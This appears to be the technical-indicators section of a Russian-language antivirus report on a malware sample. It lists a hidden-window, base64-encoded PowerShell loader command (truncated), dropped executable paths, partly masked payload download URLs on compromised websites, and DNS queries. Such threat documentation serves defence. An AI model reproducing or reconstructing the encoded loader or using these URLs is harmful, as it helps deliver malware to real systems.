Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAMgBsADEAeAAgACAAPQBbAFQAeQBwAGUAXQAoACIAewAwAH0AewA1AH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAgAC0AZgAgACcAcwAnACwAJwBUAGUATQAnACwAJwAuAEkAJwAsACcATwAuAEQAaQBSAEUAYw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1174625.cvr
- %HOMEPATH%\lv3u2gl\v5npotg\iw0cldar_.exe
- %HOMEPATH%\lv3u2gl\v5npotg\iw0cldar_.exe
- http://se##.#martcrowd.ae/wp-admin/CLs6YFp/
- http://di##ds.com/wp-content/Bro/
- http://ev###ipping.com/10700k-overclock/I/
- http://ev###ipping.com/wp-admin/setup-config.php
- http://be########struckdrivingschool.com/cgi-bin/GWY0j/
- http://pi####rdrivered.com/cgi-bin/c7lwrb/
- DNS ASK sa####djamin.com
- DNS ASK as#####baltraders.com
- DNS ASK se##.#martcrowd.ae
- DNS ASK ch####diverse.com
- DNS ASK di##ds.com
- DNS ASK ev###ipping.com
- DNS ASK be########struckdrivingschool.com
- DNS ASK pi####rdrivered.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAMgBsADEAeAAgACAAPQBbAFQAeQBwAGUAXQAoACIAewAwAH0AewA1AH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAgAC0AZgAgACcAcwAnACwAJwBUAGUATQAnACwAJwAuAEkAJwAsACcATwAuAEQAaQBSAEUAYw...' (со скрытым окном)